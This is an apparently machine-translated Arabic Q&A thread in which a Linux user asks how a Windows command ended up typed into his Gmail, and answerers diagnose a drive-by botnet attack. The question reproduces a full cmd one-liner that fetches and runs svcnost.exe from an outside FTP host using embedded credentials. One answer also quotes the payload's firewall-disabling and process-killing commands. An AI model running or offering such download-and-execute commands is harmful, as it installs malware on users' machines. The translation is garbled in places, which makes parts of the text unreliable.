سؤال كيفية تحديد ما إذا كان جهاز الكمبيوتر الخاص بي Linux قد تم اختراقه؟


جهاز الكمبيوتر المنزلي الخاص بي عادة ما يكون قيد التشغيل ، ولكن الشاشة معطلة. في هذا المساء ، عدت إلى المنزل من العمل ووجدت ما يشبه محاولة الاختراق: في متصفحي ، كان Gmail مفتوحًا (كان ذلك أنا) ، ولكنه كان في وضع الإنشاء مع ما يلي في TO حقل:

md / c echo open cCTeamFtp.yi.org 21 >> ik & echo user ccteam10 765824 >> ik & echo binary >> ik & echo get svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe والخروج   صدى كنت تملكها

هذا يبدو وكأنه رمز سطر الأوامر ويندوز لي ، و md بدء تشغيل رمز جنبا إلى جنب مع حقيقة أن Gmail كان في وضع التأليف ، يجعل من الواضح أن شخص ما حاول تشغيل cmd أمر. أعتقد أنني كنت محظوظًا لأنني لا أقوم في الواقع بتشغيل Windows على هذا الكمبيوتر ، ولكن لدي آخرين يقومون بذلك. هذه هي المرة الأولى على الإطلاق التي يحدث فيها شيء كهذا. أنا لست خبيراً في لينكس ، ولم أكن أدير أي برامج أخرى بخلاف فايرفوكس في ذلك الوقت.

أنا متأكد تماما أنني لم أكتب هذا ، ولم يكن أي شخص آخر جسديا على جهاز الكمبيوتر الخاص بي. أيضًا ، قمت مؤخرًا بتغيير كلمة مرور Google (وكل كلمات المرور الأخرى) إلى شيء مثل vMA8ogd7bv لذلك لا أعتقد أن شخصًا ما اخترق حسابي في Google.

ماذا حدث للتو؟ كيف يقوم شخص ما بوضع ضغطات المفاتيح على جهاز الكمبيوتر الخاص بي عندما لا يكون الجهاز القديم للجهاز الذي يعمل بنظام التشغيل Windows منذ أعوام ، ولكن تثبيت Ubuntu جديد مؤخرًا؟

تحديث:
دعوني أتناول بعض النقاط والأسئلة:

  • أنا في النمسا ، في الريف. جهاز توجيه WLAN يعمل WPA2/PSK وكلمة مرور متوسطة الحجم ليست موجودة في القاموس ؛ يجب أن تكون القوة الغاشمة وأقل من 50 مترا من هنا ؛ ليس من المرجح أنها تعرضت للاختراق.
  • أنا أستخدم لوحة مفاتيح USB السلكية ، لذا من المستبعد جدًا مرة أخرى أن يكون أي شخص داخل النطاق للاختراق.
  • لم أكن أستخدم الكمبيوتر الخاص بي في ذلك الوقت. كان مجرد تباطؤ في المنزل بينما كنت في العمل. انها جهاز كمبيوتر nettop شنت على الشاشة ، لذلك أنا نادرا ما أطفئه.
  • الجهاز هو شهرين فقط من العمر ، يدير فقط Ubuntu ، وأنا لا تستخدم برامج غريبة أو زيارة مواقع غريبة. إنها أساسًا Stack Exchange و Gmail والصحف. لا ألعاب. تم تعيين أوبونتو للحفاظ على نفسه حتى الآن.
  • لست على علم بأي خدمة VNC تعمل ؛ أنا بالتأكيد لم تقم بتثبيت أو تمكين واحد. أنا أيضا لم تبدأ أي خوادم أخرى. أنا غير متأكد إذا كان أي منها يعمل في أوبونتو بشكل افتراضي؟
  • أعرف جميع عناوين IP في نشاط حساب Gmail. أنا متأكد من أن Google لم تكن مدخلاً.
  • لقد وجدت ال سجل ملف عارضلكن لا أعرف ما الذي يجب البحث عنه مساعدة؟

ما أريد معرفته حقًا ، وما يجعلني أشعر بعدم الأمان ، هو: كيف يمكن لأي شخص من الإنترنت توليد ضربات المفاتيح على جهازي؟ كيف يمكنني منع ذلك من دون أن يكون كل شيء رباعي؟ أنا لست مهووسًا بنظام لينوكس ، فأنا الأب الذي أفسد نظام Windows لأكثر من 20 عامًا ، وقد سئمت منه. وفي جميع السنوات التي تزيد عن 18 عامًا في الاتصال بالإنترنت ، لم أشاهد مطلقًا أي محاولة اختراق ، لذا فهذا جديد بالنسبة لي.


126
2018-04-20 18:24


الأصل


هل تمكن أي شخص آخر من الوصول إلى جهاز الكمبيوتر الخاص بك ، أو هل لديك لوحة مفاتيح لاسلكية قديمة جدًا؟ أيضا ، أوبونتو لديه المدمج في خادم VNC. إذا كان ذلك نشطًا ، فيمكن أن يكون هناك نصًا عشوائيًا في مكان ما متصلاً ويفترض أنه كان جهاز كمبيوتر يعمل بنظام التشغيل windows ، وإرسال ضغطات المفاتيح WIN + R و cmd ...... - TuxRug
torbengb: مشاركتك هل حقا يخيفني... - Mehrdad
هل توجد أجهزة كمبيوتر أخرى على شبكتك اللاسلكية؟ إذا كسر الدخيل هم الأمن سيعطيه "في" إلى الشبكة المحلية الخاصة بك ، والتي يمكن أن تؤدي إلى تكسير مربع أوبونتو بطرق مختلفة. - CarlF
muntoo ... و'm متأكد من أنك لم تكتب ذلك في أي مكان ولا تستخدم أي تطبيق لإدارتها ، أليس كذلك؟ دعونا لا نبدأ بضرب كلمة المرور ؛ على الأقل كلمة المرور الخاصة بي ليست كذلك password :-) - Torben Gundtofte-Bruun
هل لديك قطه؟ - Zaki


الأجوبة:


أشك في أن لديك أي شيء يدعو للقلق. كان أكثر من المحتمل هجوم جافا سكريبت الذي حاول القيام به القيادة عن طريق التحميل. إذا كنت تشعر بالقلق إزاء هذا البدء في استخدام نوسكريبت و Adblock زائد إضافات فَيَرفُكس.

حتى إذا كنت تزور مواقع موثوق بها ، فأنت لست آمنًا لأنها تعمل على تشغيل شفرة جافا سكريبت من معلنين آخرين قد يكونون ضارين.

أمسكت به وركضته في جهاز VM. تثبيته mirc وهذا هو سجل الحالة ... http://pastebin.com/Mn85akMk

إنه هجوم آلي يحاول الحصول على تنزيل mIRC والانضمام إلى الروبوتات التي ستحولك إلى سبامبوت ... كان لي رابط VM وأقوم بالاتصال بعدد من العناوين البعيدة المختلفة التي يكون أحدها autoemail-119.west320.com.

تشغيله في نظام التشغيل Windows 7 كان عليّ قبول طلب UAC والسماح له بالوصول من خلال جدار الحماية.

يبدو أن هناك الكثير من التقارير عن هذا الأمر الدقيق في المنتديات الأخرى ، وحتى أن أحدهم يقول إن ملف تورنت حاول تنفيذه عند الانتهاء من التحميل ... لست متأكداً من مدى إمكانية ذلك.

لم أستخدم هذا بنفسي ، ولكن يجب أن يتمكن من عرض اتصالات الشبكة الحالية بحيث يمكنك معرفة ما إذا كنت متصلاً بشيء خارج عن القاعدة: http://netactview.sourceforge.net/download.html


66
2018-04-20 18:41



إيه ، لماذا كانت جميع التعليقات (حتى ال عالية للغاية ذات الصلة تلك التي اكتشفت أن البرنامج النصي حاول فتح cmd نافذة او شباك) تم الحذف!؟ - BlueRaja - Danny Pflughoeft
هل سأكون في مأمن من هذا النوع من الهجوم إذا بدأت للتو باستخدام uBlock Origin؟ - RobotUnderscore


أنا أتفق مع @ jb48394 أنه من المحتمل أن يكون جافا سكريبت استغلال ، مثل كل شيء آخر في هذه الأيام.

حقيقة أنها حاولت فتح cmd نافذة او شباك (نرى تعليق @ torbengb) وتشغيل أمر ضار ، بدلا من مجرد تحميل طروادة بتكتم في الخلفية ، يقترح أنه تستغل بعض الثغرات الأمنية في Firefox والتي تسمح لها بإدخال حدود المفتاح ، لكن دون تشغيل الكود.

هذا يفسر أيضا لماذا هذا الاستغلال ، والذي كان بوضوح مكتوبة حصريًا لنظام التشغيل Windows ، ستعمل أيضًا في نظام التشغيل Linux: يقوم Firefox بتشغيل JavaScript بنفس الطريقة في جميع OS'es  (على الأقل ، فإنه يحاول :)). إذا كانت ناجمة عن تجاوز سعة المخزن المؤقت أو استغلال مماثل معدة لـ Windows ، لكانت قد تعطل البرنامج.

بالنسبة إلى مصدر شفرة جافا سكريبت - ربما كان ذلك بمثابة إعلان خبيث من Google (دورة الإعلانات في Gmail على مدار اليوم). هذا لن  يكون  ال  أول  زمن.


41
2018-04-20 21:52



مراجع لطيفة. - kizzx2
لمعلوماتك عن المقشدات ، آخر "رابط" في الواقع هو خمسة روابط منفصلة. - Pops
سيكون الأمر صادمًا جدًا إذا كان فعلاً مستغلًا لجافا سكريبت حيث يظل فايرفوكس مفتوحًا لعدة أيام. ومع ذلك ، تحتاج إلى استدعاء واجهة برمجة تطبيقات خاصة لإرسال مفاتيح إلى نظام آخر ضمن Windows ، وربما استدعاء نظام مختلف (إذا كان موجودًا) ضمن نظام التشغيل Linux. بما أن إرسال ضربات المفاتيح ليس عملية جافا سكريبت عادية ، أشك في أن فايرفوكس سينفذ مكالمة عبر النظام الأساسي لذلك. - billc.cn
@ billc.cn: أعتقد أن الكتابة إلى المخزن المؤقت لوحة المفاتيح PS / 2 يعمل بنفس الطريقة بغض النظر عن نظام التشغيل. - BlueRaja - Danny Pflughoeft


وجدت هجوم مماثل على جهاز لينكس آخر. يبدو أنه نوع من الأوامر FTP لنظام Windows.


12
2018-04-20 18:36



بتعبير أدق ، يقوم بتنزيل الملف وتشغيله ftp://ccteam10:765824@cCTeamFtp.yi.org/svcnost.exe باستخدام ويندوز ftp أداة سطر الأوامر. - grawity
وجدت على pastebin أيضا pastebin.com/FXwRpKH4 - Shekhar
هنا معلومات حول الموقع whois.domaintools.com/216.210.179.67 - Shekhar
إنها حزمة WinRAR SFX التي تحتوي على تثبيت mIRC محمول وملف يسمى "DriverUpdate.exe." ينفذ DriverUpdate.exe (على الأقل) اثنين من أوامر shell: تعيين netsh جدار الحماية تعطيل opmode و taskkill / F / IM VCSPAWN.EXE / T كما يحاول (على ما أظن) لإضافة die-freesms-seite.com إلى منطقة موثوق بها في Internet Explorer وتجاوز الوكيل. - Andrew Lambert


هذا لا يجيب على السؤال بأكمله ، ولكن في ملف السجل ابحث عن محاولات تسجيل الدخول الفاشلة.

إذا كان هناك أكثر من خمس محاولات فاشلة في السجل الخاص بك ، ثم حاول شخص ما للقضاء root. إذا كان هناك محاولة ناجحة تسجيل الدخول إلى root بينما كنت بعيدا عن جهاز الكمبيوتر الخاص بك ، وتغيير كلمة السر الخاصة بك على الفور! أعني الآن! ويفضل أن يكون ذلك أبجديًا رقميًا وحوالي 10 أحرف.

مع الرسائل التي حصلت عليها ( echoالأوامر) هذا يبدو حقا مثل بعض غير ناضجة النصي كيدي. إذا كان أحد المتسللين الحقيقيين يعرف ما كان يفعله ، فربما لا تزال لا تعرفه.


5
2018-04-21 04:13



أوافق على هذا من الواضح أنه من الهواة للغاية. على الأقل ما كان يجب أن يضعوه صدى كنت تملكها في نهايةالمطاف. يجعلني أتساءل ما إذا كان أي "قراصنة حقيقيين" من أي وقت مضى من خلال؟ أو ربما أقوم بشول ربما كم العدد؟ - Torben Gundtofte-Bruun
torgengb: إذا تم تشغيل الأمر في موجه أوامر Windows ، فلن ترى الصدى (بسبب &exit) - BlueRaja - Danny Pflughoeft


whois تقارير west320.com مملوكة لشركة مايكروسوفت.

بنب و فينو (النظام -> التفضيلات -> سطح المكتب البعيد) إلى جانب كلمة مرور ضعيفة في Ubuntu؟

هل استخدمت أي مستودعات غير قياسية؟

DEF CON لديه منافسة Wi-Fi كل سنة لمعرفة إلى أي مدى يمكن الوصول إلى نقطة وصول Wi-Fi - آخر سمعت أنه كان 250 ميلاً.

إذا كنت تريد حقا أن تكون خائفا ، إلقاء نظرة على لقطات من مركز قيادة ن تحكم ل زيوس الروبوتات. لا توجد آلة آمنة ، ولكن Firefox على Linux أكثر أمانًا من الباقي. حتى أفضل ، إذا قمت بتشغيل سيلينو.


-1
2018-04-20 21:59



مؤلف هذا الاستغلال بوضوح ليس لديه نية لتشغيل هذا على لينكس ، لذلك أشك في أنه كان له علاقة بأداة جنوم ضعيفة أو كلمة مرور ضعيفة (أيضا ، OP سبق ذكره لديه كلمة مرور آمنة) - BlueRaja - Danny Pflughoeft
في الواقع ، هو لا يذكر وجود كلمة مرور Ubuntu ، فقط gmail و passphrase اللاسلكي. قد لا يعرف طفل يدير metasploit حتى عن لينكس ، يرى VNC فقط. هو على الأرجح هجوم جافا سكريبت. - rjt